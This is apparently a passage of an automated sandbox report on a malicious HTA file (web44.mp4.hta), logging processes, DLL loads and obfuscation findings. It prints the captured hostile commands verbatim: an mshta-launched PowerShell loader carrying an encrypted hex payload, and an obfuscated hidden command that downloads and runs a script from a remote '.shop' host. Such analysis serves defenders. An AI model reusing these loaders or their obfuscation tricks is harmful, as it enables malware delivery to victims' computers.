              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.AesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: web44.mp4.htaStatic file information: File size 1288850 > 1048576

              Data Obfuscation

              barindex
              Source: 4.2.powershell.exe.82e0000.3.raw.unpack, -.cs.Net Code: _E001 System.AppDomain.Load(byte[])
              Source: 4.2.powershell.exe.82e0000.3.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes
